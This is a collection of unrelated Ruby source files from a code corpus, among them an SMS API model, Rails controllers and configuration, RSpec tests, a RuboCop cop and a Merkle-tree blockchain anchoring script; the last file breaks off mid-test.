# Name of the sender. **The number of characters is limited to 11 for alphanumeric characters and 15 for numeric characters**
attr_accessor :sender
# Mobile number to send SMS with the country code
attr_accessor :recipient
# Content of the message. If more than 160 characters long, will be sent as multiple text messages
attr_accessor :content
# Type of the SMS. Marketing SMS messages are those sent typically with marketing content. Transactional SMS messages are sent to individuals and are triggered in response to some action, such as a sign-up, purchase, etc.
attr_accessor :type
# Tag of the message
attr_accessor :tag
# Webhook to call for each event triggered by the message (delivered etc.)
attr_accessor :web_url
# Format of the message. It indicates whether the content should be treated as unicode or not.
attr_accessor :unicode_enabled
class EnumAttributeValidator
attr_reader :datatype
attr_reader :allowable_values
def initialize(datatype, allowable_values)
@allowable_values = allowable_values.map do |value|
case datatype.to_s
when /Integer/i
value.to_i
when /Float/i
value.to_f
else
value
end
end
end
def valid?(value)
!value || allowable_values.include?(value)
end
end
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
:'sender' => :'sender',
:'recipient' => :'recipient',
:'content' => :'content',
:'type' => :'type',
:'tag' => :'tag',
:'web_url' => :'webUrl',
:'unicode_enabled' => :'unicodeEnabled'
}
end
# Attribute type mapping.
def self.swagger_types
{
:'sender' => :'String',
:'recipient' => :'String',
:'content' => :'String',
:'type' => :'String',
:'tag' => :'String',
:'web_url' => :'String',
:'unicode_enabled' => :'BOOLEAN'
}
end
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
if attributes.has_key?(:'sender')
self.sender = attributes[:'sender']
end
if attributes.has_key?(:'recipient')
self.recipient = attributes[:'recipient']
end
if attributes.has_key?(:'content')
self.content = attributes[:'content']
end
if attributes.has_key?(:'type')
self.type = attributes[:'type']
else
self.type = 'transactional'
end
if attributes.has_key?(:'tag')
self.tag = attributes[:'tag']
end
if attributes.has_key?(:'webUrl')
self.web_url = attributes[:'webUrl']
end
if attributes.has_key?(:'unicodeEnabled')
self.unicode_enabled = attributes[:'unicodeEnabled']
else
self.unicode_enabled = false
end
end
# Show invalid properties with the reasons. Usually used together with valid?
# @return Array for valid properties with the reasons
def list_invalid_properties
invalid_properties = Array.new
if @sender.nil?
invalid_properties.push('invalid value for "sender", sender cannot be nil.')
end
if @sender.to_s.length > 15
invalid_properties.push('invalid value for "sender", the character length must be smaller than or equal to 15.')
end
if @recipient.nil?
invalid_properties.push('invalid value for "recipient", recipient cannot be nil.')
end
if @content.nil?
invalid_properties.push('invalid value for "content", content cannot be nil.')
end
invalid_properties
end
# Check to see if the all the properties in the model are valid
# @return true if the model is valid
def valid?
return false if @sender.nil?
return false if @sender.to_s.length > 15
return false if @recipient.nil?
return false if @content.nil?
type_validator = EnumAttributeValidator.new('String', ['transactional', 'marketing'])
return false unless type_validator.valid?(@type)
true
end
# Custom attribute writer method with validation
# @param [Object] sender Value to be assigned
def sender=(sender)
if sender.nil?
fail ArgumentError, 'sender cannot be nil'
end
if sender.to_s.length > 15
fail ArgumentError, 'invalid value for "sender", the character length must be smaller than or equal to 15.'
end
@sender = sender
end
# Custom attribute writer method checking allowed values (enum).
# @param [Object] type Object to be assigned
def type=(type)
validator = EnumAttributeValidator.new('String', ['transactional', 'marketing'])
unless validator.valid?(type)
fail ArgumentError, 'invalid value for "type", must be one of #{validator.allowable_values}.'
end
@type = type
end
# Checks equality by comparing each attribute.
# @param [Object] Object to be compared
def ==(o)
return true if self.equal?(o)
self.class == o.class &&
sender == o.sender &&
recipient == o.recipient &&
content == o.content &&
type == o.type &&
tag == o.tag &&
web_url == o.web_url &&
unicode_enabled == o.unicode_enabled
end
# @see the `==` method
# @param [Object] Object to be compared
def eql?(o)
self == o
end
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[sender, recipient, content, type, tag, web_url, unicode_enabled].hash
end
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /\AArray<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
self.send("#{key}=", attributes[self.class.attribute_map[key]].map { |v| _deserialize($1, v) })
end
elsif !attributes[self.class.attribute_map[key]].nil?
self.send("#{key}=", _deserialize(type, attributes[self.class.attribute_map[key]]))
end # or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# Deserializes the data based on type
# @param string type Data type
# @param string value Value to be deserialized
# @return [Object] Deserialized data
def _deserialize(type, value)
case type.to_sym
when :DateTime
DateTime.parse(value)
when :Date
Date.parse(value)
when :String
value.to_s
when :Integer
value.to_i
when :Float
value.to_f
when :BOOLEAN
if value.to_s =~ /\A(true|t|yes|y|1)\z/i
true
else
false
end
when :Object
# generic object (usually a Hash), return directly
value
when /\AArray<(?<inner_type>.+)>\z/
inner_type = Regexp.last_match[:inner_type]
value.map { |v| _deserialize(inner_type, v) }
when /\AHash<(?<k_type>.+?), (?<v_type>.+)>\z/
k_type = Regexp.last_match[:k_type]
v_type = Regexp.last_match[:v_type]
{}.tap do |hash|
value.each do |k, v|
hash[_deserialize(k_type, k)] = _deserialize(v_type, v)
end
end
else # model
temp_model = SibApiV3Sdk.const_get(type).new
temp_model.build_from_hash(value)
end
end
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# to_body is an alias to to_hash (backward compatibility)
# @return [Hash] Returns the object in the form of hash
def to_body
to_hash
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = self.send(attr)
next if value.nil?
hash[param] = _to_hash(value)
end
hash
end
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
| 32.581761 | 839 | 0.620693 |
e9dfdee642b07823f908688888654ef36824c2e2 | 576 | require 'forwardable'
module Cucumber
  module Formatter
    # Adapter to make #puts/#print/#flush work with win32console
    class ColorIO #:nodoc:
      extend Forwardable
      def_delegators :@kernel, :puts, :print # win32console colours only work when sent to Kernel
      def_delegators :@stdout, :flush, :tty?, :write, :close
      # @param kernel the Kernel (receives puts/print so colours work)
      # @param stdout the real output stream (receives flush/write/etc.)
      def initialize(kernel, stdout)
        @kernel = kernel
        @stdout = stdout
      end
      # Ensure using << still gets colours in win32console
      # Returns self so << calls can be chained like a normal IO.
      def <<(output)
        print(output)
        self
      end
    end
  end
end
| 24 | 97 | 0.637153 |
bfc2c6d02b731a053433dda8548a741cd129818c | 2,994 | # frozen_string_literal: true
module CIT
  module Actions
    # Namespace with the entry points for all actions on records of mad
    # scientists. Each function is a thin wrapper around the corresponding
    # action class from the `mad_scientists/` directory.
    module MadScientists
      require_relative 'mad_scientists/create'
      require_relative 'mad_scientists/destroy'
      require_relative 'mad_scientists/index'
      require_relative 'mad_scientists/show'
      require_relative 'mad_scientists/update'

      class << self
        # Creates a new record of a mad scientist.
        # @param [Object] params
        #   action parameters: an associative array, a JSON string, or an
        #   object responding to `#read`
        # @param [NilClass, Hash] rest
        #   additional action parameters, or `nil` when there are none
        # @return [Hash]
        #   associative array with information about the created record
        def create(params, rest = nil)
          Create.new(params, rest).create
        end

        # Destroys a record of a mad scientist.
        # @param [Object] params
        #   action parameters: an associative array, a JSON string, or an
        #   object responding to `#read`
        # @param [NilClass, Hash] rest
        #   additional action parameters, or `nil` when there are none
        def destroy(params, rest = nil)
          Destroy.new(params, rest).destroy
        end

        # Extracts information on all mad scientists.
        # @param [Object] params
        #   action parameters: an associative array, a JSON string, or an
        #   object responding to `#read`
        # @param [NilClass, Hash] rest
        #   additional action parameters, or `nil` when there are none
        # @return [Array]
        #   resulting array
        def index(params, rest = nil)
          Index.new(params, rest).index
        end

        # Extracts information on a single mad scientist.
        # @param [Object] params
        #   action parameters: an associative array, a JSON string, or an
        #   object responding to `#read`
        # @param [NilClass, Hash] rest
        #   additional action parameters, or `nil` when there are none
        # @return [Hash]
        #   resulting associative array
        def show(params, rest = nil)
          Show.new(params, rest).show
        end

        # Updates information on a mad scientist.
        # @param [Object] params
        #   action parameters: an associative array, a JSON string, or an
        #   object responding to `#read`
        # @param [NilClass, Hash] rest
        #   additional action parameters, or `nil` when there are none
        def update(params, rest = nil)
          Update.new(params, rest).update
        end
      end
    end
  end
end
| 36.512195 | 75 | 0.655311 |
3989b9c90cf5b0979b14525b6a37156b4b4dca98 | 172 | require 'guard'
require 'guard/guard'
module Guard
  # Guard plugin that shells out to the `autorefresh` command whenever a
  # watched file changes.
  class Autorefresh < Guard
    # Called by Guard with the list of changed paths. The individual paths
    # are not inspected — any change triggers a full refresh.
    def run_on_change(_paths)
      system('autorefresh my_awesome_app')
    end
  end
end
08924e54182b9472581a3489ae970bd725587393 | 660 | # frozen_string_literal: true
module RuboCop
  module Cop
    module Minitest
      # This cop enforces the test to use `assert_in_delta`
      # instead of using `assert_equal` to compare floats.
      #
      # @example
      #   # bad
      #   assert_equal(0.2, actual)
      #   assert_equal(0.2, actual, 'message')
      #
      #   # good
      #   assert_in_delta(0.2, actual)
      #   assert_in_delta(0.2, actual, 0.001, 'message')
      #
      class AssertInDelta < Cop
        # Shared offense-reporting/autocorrect logic for the *_in_delta cops.
        include InDeltaMixin
        # Node pattern matching `assert_equal(expected, actual, *rest)`;
        # captures the two compared operands and any trailing message args.
        def_node_matcher :equal_floats_call, <<~PATTERN
          (send nil? :assert_equal $_ $_ $...)
        PATTERN
      end
    end
  end
end
| 23.571429 | 59 | 0.578788 |
ab716b124fbe58958b2faadc97748609af6108a5 | 932 | RSpec::Matchers.define :schedule_rake do |task|
match do |whenever|
jobs = whenever.instance_variable_get("@jobs")
key = @duration.is_a?(ActiveSupport::Duration) ? @duration.to_i : @duration
if jobs.has_key?(key)
jobs[key].any? do |job|
options = job.instance_variable_get("@options")
options[:task] == task && (@time.present? ? job.at == @time : true)
end
else
puts "as"
false
end
end
chain :every do |duration|
@duration = duration
end
chain :at do |time|
@time = time
end
failure_message do |actual|
"Expected whenever to schedule #{ task } every #{ @duration } seconds"
end
failure_message_when_negated do |actual|
"Expected whenever not to schedule #{ task } every #{ @duration } seconds"
end
end
# Aliases so runner and command schedules can be asserted with the same matcher.
RSpec::Matchers.alias_matcher :schedule_runner, :schedule_rake
RSpec::Matchers.alias_matcher :schedule_command, :schedule_rake
| 25.189189 | 79 | 0.666309 |
4aab371ea1367608f25bbca24c854f9f1d0ef2a7 | 861 | # Initialiazing vars
# Today's fleet and passenger counts.
cars = 100
space_in_a_car = 4.0
drivers = 30
passengers = 90

# Derived quantities — one car per driver, so undriven cars are the surplus.
cars_not_driven = cars - drivers
cars_driven = drivers
# Total seats across the driven cars (float because space_in_a_car is 4.0).
carpool_capacity = space_in_a_car * cars_driven
# Integer division: whole passengers per driven car.
average_passengers_per_car = passengers / cars_driven

puts <<~REPORT
  There are #{cars} cars available.
  There are only #{drivers} drivers available.
  There will be #{cars_not_driven} empty cars today.
  We can transport #{carpool_capacity} people today.
  We have #{passengers} to carpool today.
  We need to put about #{average_passengers_per_car} in each car.
REPORT
| 37.434783 | 77 | 0.785134 |
7988cc9edc7cf8e922a3962e00e09149f1aa431b | 1,198 | =begin
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for AuthressSdk::Body6
# Please update as you see appropriate
describe 'Body6' do
  before do
    # Fresh model instance for every example.
    @instance = AuthressSdk::Body6.new
  end

  after do
    # No per-example teardown required.
  end

  describe 'test an instance of Body6' do
    it 'should create an instance of Body6' do
      expect(@instance).to be_instance_of(AuthressSdk::Body6)
    end
  end

  # One placeholder example group per generated attribute.
  %w[role_id name description permissions].each do |attribute|
    describe "test attribute \"#{attribute}\"" do
      it 'should work' do
        # assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
      end
    end
  end
end
| 23.038462 | 102 | 0.696995 |
21cabeadd74e0d2f3d80f27861318e0263434875 | 764 | # frozen_string_literal: true
require 'fog/core/collection'
require 'fog/aliyun/models/compute/eip_address'
module Fog
  module Compute
    class Aliyun
      # Collection of EIP (Elastic IP) address models for the Aliyun
      # compute service.
      class EipAddresses < Fog::Collection
        model Fog::Compute::Aliyun::EipAddress

        # Fetches the EIP addresses matching the given filters and loads
        # them into this collection.
        def all(filters_arg = {})
          response = service.list_eip_addresses(filters_arg)
          records = Fog::JSON.decode(response.body)['EipAddresses']['EipAddress']
          load(records)
        end

        # Looks up a single EIP address by allocation id; returns nil when
        # no id is given.
        def get(allocation_id)
          return unless allocation_id
          self.class.new(service: service).all(allocation_id: allocation_id)[0]
        end
      end
    end
  end
end
| 26.344828 | 109 | 0.624346 |
01147a9e5956a786a456cfce5c673d65d3aff60e | 934 | require 'test_helper'
describe Enumerize::Base do
  # Anonymous host class so each example enumerizes a clean target.
  let(:klass) do
    Class.new do
      extend Enumerize
    end
  end
  let(:subklass) do
    Class.new(klass)
  end
  let(:object) { klass.new }
  it 'returns [] when not set' do
    klass.enumerize :foos, in: %w(a b), multiple: true
    object.foos.must_equal []
  end
  it 'returns setted array' do
    klass.enumerize :foos, in: %w(a b c), multiple: true
    object.foos = %w(a c)
    object.foos.must_equal %w(a c)
  end
  # multiple: true attributes must not get the singular helper methods.
  it "doesn't define _text method" do
    klass.enumerize :foos, in: %w(a b c), multiple: true
    object.wont_respond_to :foos_text
  end
  it "doesn't define _value method" do
    klass.enumerize :foos, in: %w(a b c), multiple: true
    object.wont_respond_to :foos_value
  end
  # scope generation is incompatible with multiple-valued attributes.
  it "cannot define multiple with scope" do
    assert_raises ArgumentError do
      klass.enumerize :foos, in: %w(a b c), multiple: true, scope: true
    end
  end
end
| 21.72093 | 71 | 0.656317 |
1db24f35cb45c34bfaeb0dd1a784415972b514f8 | 4,617 | #!/usr/bin/env ruby
# encoding: utf-8
require 'optparse'
require 'httparty'
require 'merkle-hash-tree'
require 'digest'
require 'base64'
# The last CLI argument carries a JSON configuration blob with the keys
# "pia_url", "app_key" and "app_secret" (see setupApp below).
# NOTE(review): JSON is never required explicitly here — presumably loaded
# transitively via httparty; confirm.
config_raw = ARGV.pop
config = JSON.parse(config_raw)
# Builds the common HTTP headers for authenticated JSON requests against
# the PIA API. The bearer token comes from getToken/setupApp.
def defaultHeaders(token)
  auth_value = 'Bearer ' + token
  {
    'Accept' => '*/*',
    'Content-Type' => 'application/json',
    'Authorization' => auth_value
  }
end
# Requests an OAuth2 client-credentials access token from the PIA instance.
#
# @param pia_url [String] base URL of the PIA instance
# @param app_key [String] OAuth client id (used as basic-auth username)
# @param app_secret [String] OAuth client secret (basic-auth password)
# @return [String, nil] the access token, or nil when authentication failed
def getToken(pia_url, app_key, app_secret)
  auth_url = pia_url + '/oauth/token'
  auth_credentials = { username: app_key,
                       password: app_secret }
  response = HTTParty.post(auth_url,
                           basic_auth: auth_credentials,
                           body: { grant_type: 'client_credentials' })
  # parsed_response["access_token"] is already nil when the request failed,
  # so it can be returned directly (the former if/else around nil was
  # redundant).
  response.parsed_response["access_token"]
end
# Bundles the connection settings together with a freshly fetched access
# token into a single hash that the other helpers accept as `app`.
def setupApp(pia_url, app_key, app_secret)
  {
    "pia_url" => pia_url,
    "app_key" => app_key,
    "app_secret" => app_secret,
    "token" => getToken(pia_url, app_key, app_secret)
  }
end
# Appends a log entry under the "oyd.merkle" identifier on the PIA instance.
# Fire-and-forget: callers ignore the result, so no error handling here.
# (The former unused `response =` local assignment has been dropped; the
# POST response is still the method's return value.)
#
# @param app [Hash] connection hash as produced by setupApp
# @param message [String] log line to record
def writeLog(app, message)
  url = app["pia_url"] + '/api/logs/create'
  headers = defaultHeaders(app["token"])
  HTTParty.post(url,
                headers: headers,
                body: { identifier: "oyd.merkle",
                        log: message }.to_json)
end
# setup
# id_array collects the PIA item ids, hash_array their SHA256 digests; the
# hash array backs the Merkle hash tree built below.
id_array = Array.new
hash_array = Array.new
mht = MerkleHashTree.new(hash_array, Digest::SHA256)
ma = setupApp(config["pia_url"],
              config["app_key"],
              config["app_secret"])
# puts "Token: " + ma['token'].to_s
headers = defaultHeaders(ma["token"])
# get list of new and updated items
data_url = config["pia_url"] + '/api/items/merkle'
items = HTTParty.get(data_url,
                     headers: headers).parsed_response
# log entry
writeLog(ma, 'start: ' + items.count.to_s + ' items')
if items.count > 0
  # create merkel record
  create_merkle_url = config["pia_url"] + '/api/merkles/create'
  response = HTTParty.post(create_merkle_url,
                           headers: headers,
                           body: { }.to_json ).parsed_response
  merkle_id = response['id'].to_s
  # process each item: hash its value and tag the item with the merkle id
  items.each do |item|
    item_id = item['id']
    item_hash = Digest::SHA256.digest(item['value'])
    id_array << item_id
    hash_array << item_hash
    # puts item_id.to_s + ": " + Base64.encode64(item_hash).rstrip
    # write merkel.id in item
    update_item_url = config["pia_url"] + '/api/items/' + item_id.to_s
    tmp = HTTParty.put(update_item_url,
                       headers: headers,
                       body: {
                         oyd_hash: item_hash.unpack('H*')[0].to_s,
                         merkle_id: merkle_id }.to_json )
  end
  # A single leaf needs no tree: its own hash is the root and nothing is
  # serialized.
  if hash_array.length == 1
    serialized_object = ""
    root_node = hash_array.first.unpack('H*')[0]
  else
    serialized_object = Base64.strict_encode64(Marshal::dump(mht)).strip
    root_node = mht.head().unpack('H*')[0]
  end
  # puts "===================\n"
  # puts "root_node: " + root_node.to_s
  # Anchor the root hash in the configured blockchain backend.
  case ENV["BLOCKCHAIN"].to_s
  when "ARTIS"
    blockchain_url = 'http://' + ENV["DOCKER_LINK_BC"].to_s + ':' + (ENV["DOCKER_LINK_BC_PORT"] || "3000") + '/api/create'
    response = HTTParty.get(blockchain_url + "?hash=0x" + root_node)
    oyd_transaction = response.parsed_response["tx"].to_s
  else
    # request transaction
    blockchain_url = 'http://' + ENV["DOCKER_LINK_BC"].to_s + ':' + (ENV["DOCKER_LINK_BC_PORT"] || "4510") + '/create'
    puts "blockchain_url: " + blockchain_url.to_s
    puts "merkle_id: " + merkle_id.to_s
    puts "root_node: " + root_node.to_s
    response = HTTParty.post(blockchain_url,
                             headers: { 'Content-Type' => 'application/json'},
                             body: { id: merkle_id,
                                     hash: root_node }.to_json ).parsed_response
    # puts "repsonse: " + response.to_s
    oyd_transaction = response['transaction-id']
  end
  # update merkel record and store
  update_merkle_url = config["pia_url"] + '/api/merkles/' + merkle_id.to_s
  response = HTTParty.put(update_merkle_url,
                          headers: headers,
                          body: { payload: id_array.to_json,
                                  merkle_tree: serialized_object,
                                  root_hash: root_node,
                                  oyd_transaction: oyd_transaction }.to_json )
  # log entry
  writeLog(ma, 'wrote ' + root_node.to_s + ' at ' + oyd_transaction.to_s)
end
# =============
# verify record
# 1) calculate hash from value
# 2) calculate audit proof with serialized mht to proof root_hash
# 3) use transaction to check root_hash in blockchain | 31.841379 | 124 | 0.604722 |
330af35c00515767191e81e3e15111e48cd3b3f3 | 1,121 | BackboneDemo2::Application.configure do
  # Settings specified here will take precedence over those in config/application.rb.
  # In the development environment your application's code is reloaded on
  # every request. This slows down response time but is perfect for development
  # since you don't have to restart the web server when you make code changes.
  config.cache_classes = false
  # Do not eager load code on boot.
  config.eager_load = false
  # Show full error reports and disable caching.
  config.consider_all_requests_local = true
  config.action_controller.perform_caching = false
  # Don't care if the mailer can't send.
  config.action_mailer.raise_delivery_errors = false
  # Print deprecation notices to the Rails logger.
  config.active_support.deprecation = :log
  # Raise an error on page load if there are pending migrations
  # (shows the "Migrations are pending" screen instead of obscure failures).
  config.active_record.migration_error = :page_load
  # Debug mode disables concatenation and preprocessing of assets.
  # This option may cause significant delays in view rendering with a large
  # number of complex assets.
  config.assets.debug = true
| 37.366667 | 85 | 0.773417 |
f8bbb2eef0fbe6bc84031cd73a93bed0df0e30c7 | 88 | $LOAD_PATH.unshift File.expand_path("../../lib", __FILE__)
require "tracker_deliveries"
| 29.333333 | 58 | 0.761364 |
e9560eff75b76085d682d64c239695730053b162 | 1,030 | module VersionedDatabaseFunctions
module Adapters
class Postgres
# Decorates an ActiveRecord connection with methods that help determine
# the connections capabilities.
#
# Every attempt is made to use the versions of these methods defined by
# Rails where they are available and public before falling back to our own
# implementations for older Rails versions.
#
# @api private
class Connection < SimpleDelegator
# An integer representing the version of Postgres we're connected to.
#
# postgresql_version is public in Rails 5, but protected in earlier
# versions.
#
# @return [Integer]
def postgresql_version
if undecorated_connection.respond_to?(:postgresql_version)
super
else
undecorated_connection.send(:postgresql_version)
end
end
private
def undecorated_connection
__getobj__
end
end
end
end
end
| 28.611111 | 80 | 0.640777 |
21cd2260e30540216afa032038e9b53a4858ec20 | 123 | require 'sinatra/base'
# Minimal Sinatra application exposing a single route.
class SinatraStem < Sinatra::Base
  # GET / — responds with a static greeting string.
  get '/' do
    "Hellllllo! i am Lindsey Lohan!!"
  end
end
| 12.3 | 37 | 0.650407 |
ffdc863ce006ddc037af17d9fb246077676873ba | 2,663 | class Admin::UsersController < Admin::AdminController
before_action :set_admin_user, only: [:show, :edit, :update, :destroy]
def initialize(*params)
super(*params)
@category = t(:menu_user,scope:[:admin_menu])
@controller_name = t('activerecord.models.user')
end
# GET /admin_users
# GET /admin_users.json
def index
params[:per_page] = 10 unless params[:per_page].present?
@admin_users = User.order('id desc').page(params[:page]).per(params[:per_page])
respond_to do |format|
format.html # index.html.erb
format.json { render json: @admin_users }
end
end
# GET /admin_users/1
# GET /admin_users/1.json
def show
respond_to do |format|
format.html # show.html.erb
format.json { render json: @admin_user }
end
end
# GET /admin_users/new
# GET /admin_users/new.json
def new
@admin_user = User.new
respond_to do |format|
format.html # new.html.erb
format.json { render json: @admin_user }
end
end
# GET /admin_users/1/edit
def edit
end
# POST /admin_users
# POST /admin_users.json
def create
@admin_user = User.new(admin_user_params)
respond_to do |format|
if @admin_user.save
format.html { redirect_to admin_user_path(@admin_user), notice: @controller_name +t(:message_success_create) }
format.json { render json: @admin_user, status: :created, location: @admin_user }
else
format.html { render action: "new" }
format.json { render json: @admin_user.errors, status: :unprocessable_entity }
end
end
end
# PUT /admin_users/1
# PUT /admin_users/1.json
def update
respond_to do |format|
if @admin_user.update_attributes(admin_user_params)
format.html { redirect_to admin_user_path(@admin_user), notice: @controller_name +t(:message_success_update) }
format.json { head :no_content }
else
format.html { render action: "edit" }
format.json { render json: @admin_user.errors, status: :unprocessable_entity }
end
end
end
# DELETE /admin_users/1
# DELETE /admin_users/1.json
def destroy
@admin_user.destroy
respond_to do |format|
format.html { redirect_to admin_users_path}
format.json { head :no_content }
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_admin_user
@admin_user = User.find(params[:id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def admin_user_params
params.require(:user).permit(:id, :name, :email, :password, :description, :photo)
end
end
| 26.63 | 118 | 0.674427 |
08b93a38f2743682144e80518a9a3e41944595ac | 1,712 | require 'rails_helper'
require 'shared_context_for_bucket_generators'
module Physiqual
module BucketGenerators
describe EquidistantBucketGenerator do
let(:interval) { 6 }
let(:measurements_per_day) { 3 }
let(:hours_before_first_measurement) { 6 }
let(:subject) { described_class.new(measurements_per_day, interval, hours_before_first_measurement) }
include_context 'bucket_generator context'
describe 'generate' do
before do
@result = subject.generate(from, to)
@dates = @result.map(&:end_date)
end
it 'should output the correct format' do
check_result_format(@result)
end
it 'should generate date buckets as expected' do
current = from.to_date
@dates.each_with_index do |date, index|
expect(date.to_date).to eq current
current += 1.day if ((index + 1) % measurements_per_day) == 0
end
end
it 'should generate the correct number of buckets' do
# +1 because of the last day, which is not included
expect(@result.length).to eq(measurements_per_day * ((to.to_date - from.to_date).to_i + 1))
end
it 'should generate time buckets as expected' do
start = from + hours_before_first_measurement.hours
current = start.dup
@dates.each_with_index do |date, index|
expect(date.hour).to eq current.hour
expect(date.min).to eq current.min
current += interval.hours
current = current.change(hour: start.hour, min: start.min) if ((index + 1) % measurements_per_day) == 0
end
end
end
end
end
end
| 33.568627 | 115 | 0.628505 |
616d7d90500058214aa162993b95f23183085d53 | 322 | require 'rails_helper'
RSpec.describe "albums/show", type: :view do
  before(:each) do
    @album = assign(:album, Album.create!(
      :gallery => nil,
      :title => "Title"
    ))
  end
  it "renders attributes in <p>" do
    render
    # NOTE(review): match(//) is vacuous — an empty regex matches anything.
    # Scaffold artifact from the nil :gallery attribute; consider removing.
    expect(rendered).to match(//)
    expect(rendered).to match(/Title/)
  end
end
| 18.941176 | 44 | 0.611801 |
b947c94e23cc0a948c15e79b91e3e7504e1d4eef | 5,504 | # frozen_string_literal: true
# Bare harness class: mixes in the module under test so its methods can be
# exercised as Test.<method>.
class Test
  extend MSIDP::Endpoint
end
# `tenant` is the Azure AD tenant host used to build endpoint URIs.
RSpec.shared_context 'tenant' do
  let(:tenant) { 'tenant.example.com' }
end
RSpec.describe MSIDP::Endpoint, '#authorize_uri' do
  include_context 'tenant'
  subject { Test.authorize_uri(tenant) }
  it {
    is_expected.to eq URI.parse(
      "https://login.microsoftonline.com/#{tenant}/oauth2/v2.0/authorize"
    )
  }
end
RSpec.describe MSIDP::Endpoint, '#token_uri' do
  include_context 'tenant'
  subject { Test.token_uri(tenant) }
  it {
    is_expected.to eq URI.parse(
      "https://login.microsoftonline.com/#{tenant}/oauth2/v2.0/token"
    )
  }
end
# Pre-built URIs reused by the request specs below.
RSpec.shared_context 'authorize uri' do
  include_context 'tenant'
  let(:uri) { Test.authorize_uri(tenant) }
end
RSpec.shared_context 'token uri' do
  include_context 'tenant'
  let(:uri) { Test.token_uri(tenant) }
end
# Minimal request parameters used by #get/#post examples.
RSpec.shared_context 'parameters' do
  let(:params) { { param: 'param' } }
end
# Stubs Net::HTTP so no real network traffic happens; the including context
# must define `response`.
RSpec.shared_context 'Net::HTTP mock' do
  let(:http) { instance_double(Net::HTTP) }
  before do
    allow(http).to receive(:request).and_return(response)
    allow(Net::HTTP).to receive(:start).and_yield(http)
  end
end
# Builds a 200 response; `res_body`/`res_contenttype` come from includers.
RSpec.shared_context 'HTTP success response' do
  let(:response) do
    Net::HTTPOK.new(nil, 200, 'OK').tap do |res|
      res.content_type = res_contenttype
      allow(res).to receive(:body).and_return(res_body)
    end
  end
end
# Plain-text 200 response used by the raw #get/#post examples.
RSpec.shared_context 'HTTPOK response' do
  let(:res_body) { 'HTTP response body' }
  let(:res_contenttype) { 'text/plain' }
  include_context 'HTTP success response'
end
# Asserts the request hits the expected host/path/body and that the raw
# Net::HTTPOK response is returned unchanged.
RSpec.shared_examples 'receiving HTTPOK response' do
  include_context 'Net::HTTP mock'
  include_context 'parameters'
  include_context 'HTTPOK response'
  it {
    expect(Net::HTTP).to receive(:start)
      .with(uri.host, uri.port, anything)
    expect(http).to receive(:request).with(
      have_attributes(path: path, body: body)
    )
    is_expected.to be_instance_of(Net::HTTPOK)
      .and have_attributes(code: 200, body: res_body)
  }
end
RSpec.describe MSIDP::Endpoint, '#get' do
  include_context 'authorize uri'
  subject { Test.get(uri, params) }
  include_examples 'receiving HTTPOK response' do
    # GET carries the parameters in the query string, not the body.
    let(:path) do
      uri.dup.tap { |u| u.query = URI.encode_www_form(params) }.request_uri
    end
    let(:body) { nil }
  end
end
RSpec.describe MSIDP::Endpoint, '#post' do
  include_context 'token uri'
  subject { Test.post(uri, params) }
  include_examples 'receiving HTTPOK response' do
    # POST carries the parameters form-encoded in the body.
    let(:path) { uri.request_uri }
    let(:body) { URI.encode_www_form(params) }
  end
end
# JSON success payload shaped like an OAuth token response; the Date header
# is fixed so token expiry can be asserted deterministically.
RSpec.shared_context 'token response' do
  let(:token) { 'TOKEN' }
  let(:expires_in) { 3599 }
  let(:res_obj) do
    { token_type: 'Bearer', expires_in: expires_in, access_token: token }
  end
  let(:res_body) { JSON.dump(res_obj) }
  let(:res_contenttype) { 'application/json;' }
  let(:date) { Time.at(1234) }
  include_context 'HTTP success response'
  before do
    response['date'] = date.to_s
  end
end
# JSON 400 payload in the OAuth error format (error/error_description).
RSpec.shared_context 'HTTP error response' do
  let(:error_code) { 'test_error' }
  let(:error_obj) { { error: error_code, error_description: 'Test Error' } }
  let(:response) do
    Net::HTTPBadRequest.new(nil, 400, 'Bad Request').tap do |res|
      res.content_type = 'application/json'
      allow(res).to receive(:body).and_return(JSON.dump(error_obj))
    end
  end
end
# NOTE(review): "rising" is presumably a typo for "raising"; renaming would
# require touching every include_examples call site.
RSpec.shared_examples 'rising an error' do
  it {
    expect { subject }.to raise_error MSIDP::Error, &error_spec
  }
end
RSpec.shared_examples 'rising a hash error' do
  include_context 'HTTP error response'
  let(:error_spec) { ->(e) { expect(e.error).to eq error_code } }
  include_examples 'rising an error'
end
RSpec.shared_examples 'rising a text error' do
  include_context 'HTTPOK response'
  let(:error_spec) { ->(e) { expect(e.body).to eq res_body } }
  include_examples 'rising an error'
end
RSpec.describe MSIDP::Endpoint, '#validate_json_response' do
  subject { Test.validate_json_response(response) }
  context 'with a success response' do
    include_context 'token response'
    it { is_expected.to eq(response) }
  end
  context 'with an error response' do
    include_examples 'rising a hash error'
  end
  context 'with an invalid response' do
    include_examples 'rising a text error'
  end
end
RSpec.describe MSIDP::Endpoint, '#authorize' do
  include_context 'Net::HTTP mock'
  include_context 'authorize uri'
  include_context 'parameters'
  subject { Test.authorize(uri, params) }
  context 'with a success response' do
    include_context 'HTTPOK response'
    # #authorize should delegate to #get and hand back the raw response.
    it {
      expect(Test).to receive(:get)
